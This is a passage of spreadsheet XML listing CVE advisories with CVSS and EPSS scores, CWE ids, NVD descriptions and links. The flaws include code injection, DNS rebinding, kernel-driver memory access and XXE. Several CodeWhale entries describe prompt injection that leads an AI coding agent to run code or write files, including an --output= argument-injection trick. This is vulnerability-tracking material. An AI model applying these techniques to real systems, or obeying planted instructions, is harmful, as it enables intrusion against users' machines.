          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73079</t>
        </is>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73233</t>
        </is>
      </c>
      <c r="C1539" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1539" s="5" t="inlineStr"/>
      <c r="F1539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1539" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1539" s="5" t="inlineStr"/>
      <c r="I1539" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1539" s="5" t="inlineStr"/>
      <c r="K1539" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1539" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, the FEM Displacement Constraint task dialog in src/Mod/Fem/Gui/TaskFemConstraintDisplacement.cpp passes the xDisplacementFormula, yDisplacementFormula, and zDisplacementFormula fields of a Fem::ConstraintDisplacement object through TaskDlgFemConstraintDisplacement::accept() into Gui::Command::doCommand. The escaping helper neutralizes quotation marks but not backslashes, allowing crafted formula text to terminate the generated Python string and execute arbitrary Python code with the FreeCAD process's privileges when a victim accepts the dialog. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M1539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73233</t>
        </is>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73248</t>
        </is>
      </c>
      <c r="C1540" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1540" s="5" t="inlineStr"/>
      <c r="F1540" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1540" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1540" s="5" t="inlineStr"/>
      <c r="I1540" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1540" s="5" t="inlineStr"/>
      <c r="K1540" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="L1540" s="5" t="inlineStr">
        <is>
          <t>calibre is an e-book manager. Prior to 9.12.0, calibre processes attacker-controlled composite_template metadata from a malicious EPUB, OPF, PDF, or similar file through program: and a nested template() call whose formatter does not inherit allow_python_templates=False, allowing a nested python: template to reach compile_python_template and execute arbitrary Python code when the file is opened or imported. This issue is fixed in version 9.12.0.</t>
        </is>
      </c>
      <c r="M1540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73248</t>
        </is>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73410</t>
        </is>
      </c>
      <c r="C1541" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1541" s="5" t="inlineStr"/>
      <c r="F1541" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1541" s="5" t="inlineStr"/>
      <c r="H1541" s="5" t="inlineStr"/>
      <c r="I1541" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1541" s="5" t="inlineStr"/>
      <c r="K1541" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L1541" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, packages/backend-core/src/utils/outboundFetch.ts pinned a validated address through a Node agent, but the REST integration used getDispatcher from packages/backend-core/src/utils/fetch.ts, causing undici to ignore that agent and resolve the hostname again. A builder could use DNS rebinding to make packages/server/src/integrations/rest.ts connect to an internal address after a public address passed validation, with full response access and arbitrary REST methods. The fix adds createPinnedLookup support to the undici dispatcher and passes the validated address to custom fetch implementations. This issue is fixed in version 3.40.0.</t>
        </is>
      </c>
      <c r="M1541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73410</t>
        </is>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74860</t>
        </is>
      </c>
      <c r="C1542" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1542" s="5" t="inlineStr"/>
      <c r="F1542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1542" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1542" s="5" t="inlineStr"/>
      <c r="I1542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1542" s="5" t="inlineStr"/>
      <c r="K1542" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L1542" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t>
        </is>
      </c>
      <c r="M1542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t>
        </is>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75142</t>
        </is>
      </c>
      <c r="C1543" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1543" s="5" t="inlineStr"/>
      <c r="F1543" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1543" s="5" t="inlineStr"/>
      <c r="H1543" s="5" t="inlineStr"/>
      <c r="I1543" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1543" s="5" t="inlineStr"/>
      <c r="K1543" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1543" s="5" t="inlineStr">
        <is>
          <t>FFmpeg before commit 9d786e4 contains a stack buffer overflow in the MPEG-PS muxer (libavformat/mpegenc.c). When muxing input with more streams than the muxer's fixed-size stack buffer accommodates, the buffer is overflowed. A crafted input with an excessive number of streams triggers the overflow during MPEG-PS muxing.</t>
        </is>
      </c>
      <c r="M1543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75142</t>
        </is>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75486</t>
        </is>
      </c>
      <c r="C1544" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1544" s="5" t="inlineStr"/>
      <c r="F1544" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G1544" s="5" t="inlineStr"/>
      <c r="H1544" s="5" t="inlineStr"/>
      <c r="I1544" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1544" s="5" t="inlineStr"/>
      <c r="K1544" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1544" s="5" t="inlineStr">
        <is>
          <t>Synk Sweater Comb before 3.8.8 contains a command injection vulnerability that allows an attacker who controls the .vervet.yaml configuration file to execute arbitrary OS commands by injecting malicious input into the linters.&lt;key&gt;.optic-ci.original branch name field. The expectGitBranch() function in src/lint.ts passes the unsanitized branch name directly into child_process.exec() via an unescaped template literal, enabling arbitrary command execution when the lint command is run against the repository.</t>
        </is>
      </c>
      <c r="M1544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75486</t>
        </is>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75616</t>
        </is>
      </c>
      <c r="C1545" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1545" s="5" t="inlineStr"/>
      <c r="F1545" s="5" t="n">
        <v>0.031</v>
      </c>
      <c r="G1545" s="5" t="inlineStr"/>
      <c r="H1545" s="5" t="inlineStr">
        <is>
          <t>tp-link:archer_c20, tp-link:archer_c20_firmware</t>
        </is>
      </c>
      <c r="I1545" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1545" s="5" t="inlineStr"/>
      <c r="K1545" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1545" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability exists in the web management interface of Archer C20 v6 firmware when processing certain WAN-related configuration operations. An authenticated administrator may exploit insufficient input validation to execute arbitrary system commands, potentially resulting in full device compromise.
Successful exploitation may allow arbitrary command execution with elevated privileges, compromising the confidentiality, integrity, and availability of the affected device and network traffic passing through it.</t>
        </is>
      </c>
      <c r="M1545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75616</t>
        </is>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75858</t>
        </is>
      </c>
      <c r="C1546" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1546" s="5" t="inlineStr"/>
      <c r="F1546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1546" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1546" s="5" t="inlineStr"/>
      <c r="I1546" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1546" s="5" t="inlineStr"/>
      <c r="K1546" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1546" s="5" t="inlineStr">
        <is>
          <t>CodeWhale (packages codewhale / codewhale-tui) versions &gt;= 0.8.41 and &lt; 0.8.64 contain a remote code execution vulnerability in the rlm_eval tool. The tool's approval_requirement() returns ApprovalRequirement::Auto, which the engine treats as 'never prompt,' causing arbitrary model-supplied Python code to run in a python3 interpreter without consulting the user's configured --approval-policy and without any approval prompt or audit step. An attacker can induce the agent to execute arbitrary code via prompt injection in untrusted content the agent reads (a web page, fetched URL, repository file, or MCP tool result); the companion rlm_open tool can stage such content. Code runs on the user's machine at the user's privilege level. Fixed in 0.8.64.</t>
        </is>
      </c>
      <c r="M1546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75858</t>
        </is>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75911</t>
        </is>
      </c>
      <c r="C1547" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1547" s="5" t="inlineStr"/>
      <c r="F1547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1547" s="5" t="inlineStr"/>
      <c r="H1547" s="5" t="inlineStr"/>
      <c r="I1547" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1547" s="5" t="inlineStr"/>
      <c r="K1547" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1547" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 fail to properly validate the allow_shell configuration parameter from project config files, allowing attackers to enable arbitrary shell command execution by committing a malicious .codewhale/config.toml file to a repository. When a user clones and opens the repository in CodeWhale, the AI model gains access to exec_shell and task_shell tools, enabling execution of arbitrary shell commands on the victim's machine without explicit user consent.</t>
        </is>
      </c>
      <c r="M1547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75911</t>
        </is>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75913</t>
        </is>
      </c>
      <c r="C1548" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1548" s="5" t="inlineStr"/>
      <c r="F1548" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1548" s="5" t="inlineStr"/>
      <c r="H1548" s="5" t="inlineStr"/>
      <c r="I1548" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1548" s="5" t="inlineStr"/>
      <c r="K1548" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1548" s="5" t="inlineStr">
        <is>
          <t>CodeWhale (codewhale / codewhale-tui) versions &gt;= 0.8.41 and &lt; 0.8.64 contain an argument injection vulnerability in the git_show tool. The model-supplied rev parameter is passed unvalidated into the git show argv without an --end-of-options sentinel, so a value beginning with --output= is interpreted as a git flag. Because the tool is registered as auto-approved and advertised as read-only, an attacker (via a malicious repository combined with prompt injection) can cause an unprompted arbitrary file write at the privilege of the invoking user, targeting sensitive files such as ~/.ssh/authorized_keys, ~/.bashrc, or ~/.gitconfig. Fixed in 0.8.64 by adding rev validation.</t>
        </is>
      </c>
      <c r="M1548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75913</t>
        </is>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75993</t>
        </is>
      </c>
      <c r="C1549" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1549" s="5" t="inlineStr"/>
      <c r="F1549" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1549" s="5" t="inlineStr"/>
      <c r="H1549" s="5" t="inlineStr"/>
      <c r="I1549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1549" s="5" t="inlineStr"/>
      <c r="K1549" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1549" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M1549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t>
        </is>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="C1550" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1550" s="5" t="inlineStr"/>
      <c r="F1550" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1550" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1550" s="5" t="inlineStr"/>
      <c r="I1550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1550" s="5" t="inlineStr"/>
      <c r="K1550" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1550" s="5" t="inlineStr">
        <is>
          <t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t>
        </is>
      </c>
      <c r="M1550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="C1551" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1551" s="5" t="inlineStr"/>
      <c r="F1551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1551" s="5" t="inlineStr"/>
      <c r="H1551" s="5" t="inlineStr"/>
      <c r="I1551" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1551" s="5" t="inlineStr"/>
      <c r="K1551" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1551" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="M1551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77974</t>
        </is>
      </c>
      <c r="C1552" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1552" s="5" t="inlineStr"/>
      <c r="F1552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1552" s="5" t="inlineStr"/>
      <c r="H1552" s="5" t="inlineStr"/>
      <c r="I1552" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1552" s="5" t="inlineStr"/>
      <c r="K1552" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1552" s="5" t="inlineStr">
        <is>
          <t>After spoofing the device and obtaining one user confirmation, an attacker may be able to cause the application to transmit firmware through an unauthenticated and unsigned update channel.</t>
        </is>
      </c>
      <c r="M1552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77974</t>
        </is>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80112</t>
        </is>
      </c>
      <c r="C1553" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1553" s="5" t="inlineStr"/>
      <c r="F1553" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1553" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1553" s="5" t="inlineStr"/>
      <c r="I1553" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1553" s="5" t="inlineStr"/>
      <c r="K1553" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L1553" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an improper access control vulnerability in the DirectIo64.sys kernel driver that allows unprivileged local users to perform privileged hardware operations by opening a handle to the device object created without a security descriptor. Attackers can issue IOCTLs through the permissive default Windows ACL applied to the device to access restricted hardware operations regardless of privilege or integrity level.</t>
        </is>
      </c>
      <c r="M1553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80112</t>
        </is>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80114</t>
        </is>
      </c>
      <c r="C1554" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1554" s="5" t="inlineStr"/>
      <c r="F1554" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1554" s="5" t="inlineStr"/>
      <c r="H1554" s="5" t="inlineStr"/>
      <c r="I1554" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1554" s="5" t="inlineStr"/>
      <c r="K1554" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L1554" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a hard-coded credentials vulnerability in DirectIo64.sys that allows local attackers to perform arbitrary physical memory writes by extracting an 8-byte key embedded as a hardcoded literal in the distributed binary and computing valid MD5 authentication tags for arbitrary IOCTL write requests. Attackers can additionally bypass a secondary validation gate by using the driver's own bit-clear IOCTL to clear a single bit in the gating instruction's displacement byte, causing all subsequent write requests to skip MAC verification, size checks, and Vendor ID checks entirely.</t>
        </is>
      </c>
      <c r="M1554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80114</t>
        </is>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80116</t>
        </is>
      </c>
      <c r="C1555" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1555" s="5" t="inlineStr"/>
      <c r="F1555" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1555" s="5" t="inlineStr"/>
      <c r="H1555" s="5" t="inlineStr"/>
      <c r="I1555" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1555" s="5" t="inlineStr"/>
      <c r="K1555" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L1555" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to modify hardware configuration by exploiting exposed IOCTLs with no validation on device selection, register offset, or value. Attackers can obtain a device handle and issue arbitrary PCI configuration space read/write operations to enable Bus Master DMA on any PCI device, halt storage controller I/O by clearing command registers, or remap Base Address Registers to redirect DMA to an attacker-chosen physical address.</t>
        </is>
      </c>
      <c r="M1555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80116</t>
        </is>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80119</t>
        </is>
      </c>
      <c r="C1556" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1556" s="5" t="inlineStr"/>
      <c r="F1556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1556" s="5" t="inlineStr"/>
      <c r="H1556" s="5" t="inlineStr"/>
      <c r="I1556" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1556" s="5" t="inlineStr"/>
      <c r="K1556" s="5" t="inlineStr">
        <is>
          <t>CWE-497, CWE-73</t>
        </is>
      </c>
      <c r="L1556" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an information disclosure vulnerability in DirectIo64.sys that allows unauthenticated local attackers to dump complete physical memory contents by supplying a caller-controlled file path to an exposed IOCTL. Attackers can issue a single IOCTL call to trigger the driver to iterate all physical memory ranges via MmGetPhysicalMemoryRanges and map each page through ZwMapViewOfSection on the PhysicalMemory section object, writing a full RAM image to an attacker-specified path in the SYSTEM context, bypassing user-mode ACLs and exposing LSASS working set, process memory, and cryptographic material from all running processes.</t>
        </is>
      </c>
      <c r="M1556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80119</t>
        </is>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80378</t>
        </is>
      </c>
      <c r="C1557" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1557" s="5" t="inlineStr"/>
      <c r="F1557" s="5" t="inlineStr"/>
      <c r="G1557" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1557" s="5" t="inlineStr"/>
      <c r="I1557" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1557" s="5" t="inlineStr"/>
      <c r="K1557" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1557" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to improper authorization.</t>
        </is>
      </c>
      <c r="M1557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80378</t>
        </is>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80436</t>
        </is>
      </c>
      <c r="C1558" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1558" s="5" t="inlineStr"/>
      <c r="F1558" s="5" t="inlineStr"/>
      <c r="G1558" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1558" s="5" t="inlineStr"/>
      <c r="I1558" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1558" s="5" t="inlineStr"/>
      <c r="K1558" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1558" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service by deleting arbitrary RabbitMQ queues or exchanges due to improper authorization.</t>
        </is>
      </c>
      <c r="M1558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80436</t>
        </is>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81207</t>
        </is>
      </c>
      <c r="C1559" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1559" s="5" t="inlineStr"/>
      <c r="F1559" s="5" t="inlineStr"/>
      <c r="G1559" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
